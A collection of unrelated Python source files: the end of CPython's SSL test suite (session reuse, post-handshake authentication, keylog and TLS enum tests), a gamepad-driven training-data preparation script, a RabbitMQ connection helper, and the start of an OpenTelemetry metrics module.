sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context2.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
@unittest.skipUnless(has_tls_version('TLSv1_3'), "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
def msg_cb(conn, direction, version, content_type, msg_type, data):
if support.verbose and content_type == _TLSContentType.ALERT:
info = (conn, direction, version, content_type, msg_type, data)
sys.stdout.write(f"TLS: {info!r}\n")
server_context._msg_callback = msg_cb
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname,
suppress_ragged_eofs=False) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
# test sometimes fails with EOF error. Test passes as long as
# server aborts connection with an error.
with self.assertRaisesRegex(
ssl.SSLError,
'(certificate required|EOF occurred)'
):
# receive CertificateRequest
data = s.recv(1024)
self.assertEqual(data, b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
# optional doesn't fail when client does not have a cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
def test_bpo37428_pha_cert_none(self):
# verify that post_handshake_auth does not implicitly enable cert
# validation.
hostname = SIGNED_CERTFILE_HOSTNAME
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# no cert validation and CA on client side
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
server_context.load_verify_locations(SIGNING_CA)
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# server cert has not been validated
self.assertEqual(s.getpeercert(), {})
def test_internal_chain_client(self):
client_context, server_context, hostname = testing_context(
server_chain=False
)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname
) as s:
s.connect((HOST, server.port))
vc = s._sslobj.get_verified_chain()
self.assertEqual(len(vc), 2)
ee, ca = vc
uvc = s._sslobj.get_unverified_chain()
self.assertEqual(len(uvc), 1)
self.assertEqual(ee, uvc[0])
self.assertEqual(hash(ee), hash(uvc[0]))
self.assertEqual(repr(ee), repr(uvc[0]))
self.assertNotEqual(ee, ca)
self.assertNotEqual(hash(ee), hash(ca))
self.assertNotEqual(repr(ee), repr(ca))
self.assertNotEqual(ee.get_info(), ca.get_info())
self.assertIn("CN=localhost", repr(ee))
self.assertIn("CN=our-ca-server", repr(ca))
pem = ee.public_bytes(_ssl.ENCODING_PEM)
der = ee.public_bytes(_ssl.ENCODING_DER)
self.assertIsInstance(pem, str)
self.assertIn("-----BEGIN CERTIFICATE-----", pem)
self.assertIsInstance(der, bytes)
self.assertEqual(
ssl.PEM_cert_to_DER_cert(pem), der
)
def test_internal_chain_server(self):
client_context, server_context, hostname = testing_context()
client_context.load_cert_chain(SIGNED_CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname
) as s:
s.connect((HOST, server.port))
s.write(b'VERIFIEDCHAIN\n')
res = s.recv(1024)
self.assertEqual(res, b'\x02\n')
s.write(b'UNVERIFIEDCHAIN\n')
res = s.recv(1024)
self.assertEqual(res, b'\x02\n')
HAS_KEYLOG = hasattr(ssl.SSLContext, 'keylog_filename')
requires_keylog = unittest.skipUnless(
HAS_KEYLOG, 'test requires OpenSSL 1.1.1 with keylog callback')
class TestSSLDebug(unittest.TestCase):
def keylog_lines(self, fname=os_helper.TESTFN):
with open(fname) as f:
return len(list(f))
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_defaults(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
self.assertFalse(os.path.isfile(os_helper.TESTFN))
ctx.keylog_filename = os_helper.TESTFN
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
self.assertTrue(os.path.isfile(os_helper.TESTFN))
self.assertEqual(self.keylog_lines(), 1)
ctx.keylog_filename = None
self.assertEqual(ctx.keylog_filename, None)
with self.assertRaises((IsADirectoryError, PermissionError)):
# Windows raises PermissionError
ctx.keylog_filename = os.path.dirname(
os.path.abspath(os_helper.TESTFN))
with self.assertRaises(TypeError):
ctx.keylog_filename = 1
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_filename(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
client_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# header, 5 lines for TLS 1.3
self.assertEqual(self.keylog_lines(), 6)
client_context.keylog_filename = None
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 11)
client_context.keylog_filename = os_helper.TESTFN
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 21)
client_context.keylog_filename = None
server_context.keylog_filename = None
@requires_keylog
@unittest.skipIf(sys.flags.ignore_environment,
"test is not compatible with ignore_environment")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_env(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with unittest.mock.patch.dict(os.environ):
os.environ['SSLKEYLOGFILE'] = os_helper.TESTFN
self.assertEqual(os.environ['SSLKEYLOGFILE'], os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
ctx = ssl.create_default_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
def test_msg_callback(self):
client_context, server_context, hostname = testing_context()
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
self.assertIs(client_context._msg_callback, None)
client_context._msg_callback = msg_cb
self.assertIs(client_context._msg_callback, msg_cb)
with self.assertRaises(TypeError):
client_context._msg_callback = object()
def test_msg_callback_tls12(self):
client_context, server_context, hostname = testing_context()
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
msg = []
def msg_cb(conn, direction, version, content_type, msg_type, data):
self.assertIsInstance(conn, ssl.SSLSocket)
self.assertIsInstance(data, bytes)
self.assertIn(direction, {'read', 'write'})
msg.append((direction, version, content_type, msg_type))
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_KEY_EXCHANGE),
msg
)
self.assertIn(
("write", TLSVersion.TLSv1_2, _TLSContentType.CHANGE_CIPHER_SPEC,
_TLSMessageType.CHANGE_CIPHER_SPEC),
msg
)
def test_msg_callback_deadlock_bpo43577(self):
client_context, server_context, hostname = testing_context()
server_context2 = testing_context()[1]
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
def sni_cb(sock, servername, ctx):
sock.context = server_context2
server_context._msg_callback = msg_cb
server_context.sni_callback = sni_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
class TestEnumerations(unittest.TestCase):
def test_tlsversion(self):
class CheckedTLSVersion(enum.IntEnum):
MINIMUM_SUPPORTED = _ssl.PROTO_MINIMUM_SUPPORTED
SSLv3 = _ssl.PROTO_SSLv3
TLSv1 = _ssl.PROTO_TLSv1
TLSv1_1 = _ssl.PROTO_TLSv1_1
TLSv1_2 = _ssl.PROTO_TLSv1_2
TLSv1_3 = _ssl.PROTO_TLSv1_3
MAXIMUM_SUPPORTED = _ssl.PROTO_MAXIMUM_SUPPORTED
enum._test_simple_enum(CheckedTLSVersion, TLSVersion)
def test_tlscontenttype(self):
class Checked_TLSContentType(enum.IntEnum):
"""Content types (record layer)
See RFC 8446, section B.1
"""
CHANGE_CIPHER_SPEC = 20
ALERT = 21
HANDSHAKE = 22
APPLICATION_DATA = 23
# pseudo content types
HEADER = 0x100
INNER_CONTENT_TYPE = 0x101
enum._test_simple_enum(Checked_TLSContentType, _TLSContentType)
def test_tlsalerttype(self):
class Checked_TLSAlertType(enum.IntEnum):
"""Alert types for TLSContentType.ALERT messages
See RFC 8466, section B.2
"""
CLOSE_NOTIFY = 0
UNEXPECTED_MESSAGE = 10
BAD_RECORD_MAC = 20
DECRYPTION_FAILED = 21
RECORD_OVERFLOW = 22
DECOMPRESSION_FAILURE = 30
HANDSHAKE_FAILURE = 40
NO_CERTIFICATE = 41
BAD_CERTIFICATE = 42
UNSUPPORTED_CERTIFICATE = 43
CERTIFICATE_REVOKED = 44
CERTIFICATE_EXPIRED = 45
CERTIFICATE_UNKNOWN = 46
ILLEGAL_PARAMETER = 47
UNKNOWN_CA = 48
ACCESS_DENIED = 49
DECODE_ERROR = 50
DECRYPT_ERROR = 51
EXPORT_RESTRICTION = 60
PROTOCOL_VERSION = 70
INSUFFICIENT_SECURITY = 71
INTERNAL_ERROR = 80
INAPPROPRIATE_FALLBACK = 86
USER_CANCELED = 90
NO_RENEGOTIATION = 100
MISSING_EXTENSION = 109
UNSUPPORTED_EXTENSION = 110
CERTIFICATE_UNOBTAINABLE = 111
UNRECOGNIZED_NAME = 112
BAD_CERTIFICATE_STATUS_RESPONSE = 113
BAD_CERTIFICATE_HASH_VALUE = 114
UNKNOWN_PSK_IDENTITY = 115
CERTIFICATE_REQUIRED = 116
NO_APPLICATION_PROTOCOL = 120
enum._test_simple_enum(Checked_TLSAlertType, _TLSAlertType)
def test_tlsmessagetype(self):
class Checked_TLSMessageType(enum.IntEnum):
"""Message types (handshake protocol)
See RFC 8446, section B.3
"""
HELLO_REQUEST = 0
CLIENT_HELLO = 1
SERVER_HELLO = 2
HELLO_VERIFY_REQUEST = 3
NEWSESSION_TICKET = 4
END_OF_EARLY_DATA = 5
HELLO_RETRY_REQUEST = 6
ENCRYPTED_EXTENSIONS = 8
CERTIFICATE = 11
SERVER_KEY_EXCHANGE = 12
CERTIFICATE_REQUEST = 13
SERVER_DONE = 14
CERTIFICATE_VERIFY = 15
CLIENT_KEY_EXCHANGE = 16
FINISHED = 20
CERTIFICATE_URL = 21
CERTIFICATE_STATUS = 22
SUPPLEMENTAL_DATA = 23
KEY_UPDATE = 24
NEXT_PROTO = 67
MESSAGE_HASH = 254
CHANGE_CIPHER_SPEC = 0x0101
enum._test_simple_enum(Checked_TLSMessageType, _TLSMessageType)
def test_sslmethod(self):
Checked_SSLMethod = enum._old_convert_(
enum.IntEnum, '_SSLMethod', 'ssl',
lambda name: name.startswith('PROTOCOL_') and name != 'PROTOCOL_SSLv23',
source=ssl._ssl,
)
enum._test_simple_enum(Checked_SSLMethod, ssl._SSLMethod)
def test_options(self):
CheckedOptions = enum._old_convert_(
enum.FlagEnum, 'Options', 'ssl',
lambda name: name.startswith('OP_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedOptions, ssl.Options)
def test_alertdescription(self):
CheckedAlertDescription = enum._old_convert_(
enum.IntEnum, 'AlertDescription', 'ssl',
lambda name: name.startswith('ALERT_DESCRIPTION_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedAlertDescription, ssl.AlertDescription)
def test_sslerrornumber(self):
Checked_SSLMethod = enum._old_convert_(
enum.IntEnum, '_SSLMethod', 'ssl',
lambda name: name.startswith('PROTOCOL_') and name != 'PROTOCOL_SSLv23',
source=ssl._ssl,
)
enum._test_simple_enum(Checked_SSLMethod, ssl._SSLMethod)
def test_verifyflags(self):
CheckedVerifyFlags = enum._old_convert_(
enum.FlagEnum, 'VerifyFlags', 'ssl',
lambda name: name.startswith('VERIFY_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyFlags, ssl.VerifyFlags)
def test_verifymode(self):
CheckedVerifyMode = enum._old_convert_(
enum.IntEnum, 'VerifyMode', 'ssl',
lambda name: name.startswith('CERT_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyMode, ssl.VerifyMode)
def test_main(verbose=False):
if support.verbose:
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
TestPostHandshakeAuth, TestSSLDebug
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = threading_helper.threading_setup()
try:
support.run_unittest(*tests)
finally:
threading_helper.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
utils.py
|
#!/usr/bin/env python
import sys
import array
import numpy as np
from skimage.color import rgb2gray
from skimage.transform import resize
from skimage.io import imread
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from tqdm import tqdm
from inputs import get_gamepad
import math
import threading
def resize_image(img):
im = resize(img, (Sample.IMG_H, Sample.IMG_W, Sample.IMG_D))
im_arr = im.reshape((Sample.IMG_H, Sample.IMG_W, Sample.IMG_D))
return im_arr
class Screenshot(object):
SRC_W = 850
SRC_H = 530
SRC_D = 3
OFFSET_X = 200
OFFSET_Y = 50
class Sample:
IMG_W = 250
IMG_H = 166
IMG_D = 3
class XboxController(object):
MAX_TRIG_VAL = math.pow(2, 8)
MAX_JOY_VAL = math.pow(2, 15)
def __init__(self):
self.LeftJoystickY = 0
self.LeftJoystickX = 0
self.RightJoystickY = 0
self.RightJoystickX = 0
self.LeftTrigger = 0
self.RightTrigger = 0
self.LeftBumper = 0
self.RightBumper = 0
self.A = 0
self.X = 0
self.Y = 0
self.B = 0
self.LeftThumb = 0
self.RightThumb = 0
self.Back = 0
self.Start = 0
self.LeftDPad = 0
self.RightDPad = 0
self.UpDPad = 0
self.DownDPad = 0
self._monitor_thread = threading.Thread(target=self._monitor_controller, args=())
self._monitor_thread.daemon = True
self._monitor_thread.start()
def read(self):
x = self.LeftJoystickX
y = self.LeftJoystickY
a = self.A
b = self.B # b=1, x=2
rb = self.RightBumper
return [x, y, a, b, rb]
def _monitor_controller(self):
while True:
events = get_gamepad()
for event in events:
if event.code == 'ABS_Y':
self.LeftJoystickY = event.state / XboxController.MAX_JOY_VAL # normalize between -1 and 1
elif event.code == 'ABS_X':
self.LeftJoystickX = event.state / XboxController.MAX_JOY_VAL # normalize between -1 and 1
elif event.code == 'ABS_RY':
self.RightJoystickY = event.state / XboxController.MAX_JOY_VAL # normalize between -1 and 1
elif event.code == 'ABS_RX':
self.RightJoystickX = event.state / XboxController.MAX_JOY_VAL # normalize between -1 and 1
elif event.code == 'ABS_Z':
self.LeftTrigger = event.state / XboxController.MAX_TRIG_VAL # normalize between 0 and 1
elif event.code == 'ABS_RZ':
self.RightTrigger = event.state / XboxController.MAX_TRIG_VAL # normalize between 0 and 1
elif event.code == 'BTN_TL':
self.LeftBumper = event.state
elif event.code == 'BTN_TR':
self.RightBumper = event.state
elif event.code == 'BTN_EAST':
self.A = event.state
elif event.code == 'BTN_NORTH':
self.X = event.state
elif event.code == 'BTN_WEST':
self.Y = event.state
elif event.code == 'BTN_SOUTH':
self.B = event.state
elif event.code == 'BTN_THUMBL':
self.LeftThumb = event.state
elif event.code == 'BTN_THUMBR':
self.RightThumb = event.state
elif event.code == 'BTN_SELECT':
self.Back = event.state
elif event.code == 'BTN_START':
self.Start = event.state
elif event.code == 'BTN_TRIGGER_HAPPY1':
self.LeftDPad = event.state
elif event.code == 'BTN_TRIGGER_HAPPY2':
self.RightDPad = event.state
elif event.code == 'BTN_TRIGGER_HAPPY3':
self.UpDPad = event.state
elif event.code == 'BTN_TRIGGER_HAPPY4':
self.DownDPad = event.state
class Data(object):
def __init__(self):
self._X = np.load("data/X.npy")
self._y = np.load("data/y.npy")
self._epochs_completed = 0
self._index_in_epoch = 0
self._num_examples = self._X.shape[0]
@property
def num_examples(self):
return self._num_examples
def next_batch(self, batch_size):
start = self._index_in_epoch
self._index_in_epoch += batch_size
if self._index_in_epoch > self._num_examples:
# Finished epoch
self._epochs_completed += 1
# Start next epoch
start = 0
self._index_in_epoch = batch_size
assert batch_size <= self._num_examples
end = self._index_in_epoch
return self._X[start:end], self._y[start:end]
def load_sample(sample):
image_files = np.loadtxt(sample + '/data.csv', delimiter=',', dtype=str, usecols=(0,))
joystick_values = np.loadtxt(sample + '/data.csv', delimiter=',', usecols=(1,))
joystick_values_new = []
for jv in joystick_values:
joystick_values_new.append(jv*1.2)
return image_files, joystick_values_new
def load_imgs(sample):
image_files = np.loadtxt(sample + '/data.csv', delimiter=',', dtype=str, usecols=(0,))
return image_files
# training data viewer
def viewer(sample):
image_files, joystick_values = load_sample(sample)
plotData = []
plt.ion()
plt.figure('viewer', figsize=(16, 6))
for i in range(len(image_files)):
# joystick
print(i, " ", joystick_values[i,:])
# format data
plotData.append( joystick_values[i,:] )
if len(plotData) > 30:
plotData.pop(0)
x = np.asarray(plotData)
# image (every 3rd)
if (i % 3 == 0):
plt.subplot(121)
image_file = image_files[i]
img = mpimg.imread(image_file)
plt.imshow(img)
# plot
plt.subplot(122)
plt.plot(range(i,i+len(plotData)), x[:,0], 'r')
plt.plot(range(i,i+len(plotData)), x[:,1], 'b')
plt.plot(range(i,i+len(plotData)), x[:,2], 'g')
plt.plot(range(i,i+len(plotData)), x[:,3], 'k')
plt.plot(range(i,i+len(plotData)), x[:,4], 'y')
plt.draw()
plt.pause(0.0001) # seconds
i += 1
# prepare training data
def prepare(samples):
print("Preparing data")
num_samples = 0
for sample in samples:
image_files = load_imgs(sample)
num_samples += len(image_files)
print(f"There are {num_samples} samples")
X = []
y = []
for sample in samples:
print(sample)
# load sample
image_files, joystick_values = load_sample(sample)
joystick_values_generated = []
for i in tqdm(range(len(image_files))):
jv = joystick_values[i]
i = image_files[i]
image = imread(i)
vec = resize_image(image)
X.append(vec)
joystick_values_generated.append(jv)
y.append(joystick_values_generated)
print("Saving to file...")
X = np.asarray(X)
y = np.concatenate(y)
np.save("data/X", X)
np.save("data/y", y)
print("Done!")
return
if __name__ == '__main__':
if sys.argv[1] == 'viewer':
viewer(sys.argv[2])
elif sys.argv[1] == 'prepare':
prepare(sys.argv[2:])
|
Rabbit_Base.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 In-Q-Tel, Inc, All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
''' Created on 21 August 2017
@author: dgrossman
'''
import pika
import threading
import time
from functools import partial
from .Logger_Base import Logger
module_logger = Logger
class Rabbit_Base(object): # pragma: no cover
'''
Base Class for RabbitMQ
'''
def __init__(self):
self.logger = module_logger.logger
def make_rabbit_connection(self, host, port, exchange, queue_name, keys,
total_sleep=float('inf')): # pragma: no cover
'''
Connects to rabbitmq using the given hostname,
exchange, and queue. Retries on failure until success.
Binds routing keys appropriate for module, and returns
the channel and connection.
'''
wait = True
do_rabbit = True
rabbit_channel = None
rabbit_connection = None
while wait and total_sleep > 0:
try:
rabbit_connection = pika.BlockingConnection(
pika.ConnectionParameters(host=host, port=port))
rabbit_channel = rabbit_connection.channel()
rabbit_channel.exchange_declare(exchange=exchange,
exchange_type='topic')
rabbit_channel.queue_declare(queue=queue_name, exclusive=True)
self.logger.debug('connected to {0} rabbitmq...'.format(host))
wait = False
except Exception as e:
self.logger.debug(
'waiting for connection to {0} rabbitmq...'.format(host))
self.logger.debug(str(e))
time.sleep(2)
total_sleep -= 2
wait = True
if wait:
do_rabbit = False
if isinstance(keys, list) and not wait:
for key in keys:
self.logger.debug(
'array adding key:{0} to rabbitmq channel'.format(key))
rabbit_channel.queue_bind(exchange=exchange,
queue=queue_name,
routing_key=key)
if isinstance(keys, str) and not wait:
self.logger.debug(
'string adding key:{0} to rabbitmq channel'.format(keys))
rabbit_channel.queue_bind(exchange=exchange,
queue=queue_name,
routing_key=keys)
return rabbit_channel, rabbit_connection, do_rabbit
def start_channel(self, channel, mycallback, queue, m_queue):
''' handle threading for messagetype '''
self.logger.debug('about to start channel {0}'.format(channel))
channel.basic_consume(partial(mycallback, q=m_queue), queue=queue,
no_ack=True)
mq_recv_thread = threading.Thread(target=channel.start_consuming)
mq_recv_thread.start()
return mq_recv_thread
|
__init__.py
|
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from abc import ABC, abstractmethod
from enum import Enum
from logging import getLogger
from os import environ, linesep
from sys import stdout
from threading import Event, RLock, Thread
from typing import IO, Callable, Dict, Iterable, List, Optional, Sequence
from typing_extensions import final
# This kind of import is needed to avoid Sphinx errors.
import opentelemetry.sdk._metrics._internal
from opentelemetry.context import (
_SUPPRESS_INSTRUMENTATION_KEY,
attach,
detach,
set_value,
)
from opentelemetry.sdk._metrics._internal.aggregation import (
AggregationTemporality,
